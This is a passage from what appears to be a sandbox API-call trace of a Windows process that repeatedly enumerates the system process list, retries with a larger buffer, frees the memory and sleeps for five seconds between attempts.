BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.550] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.645] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.666] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 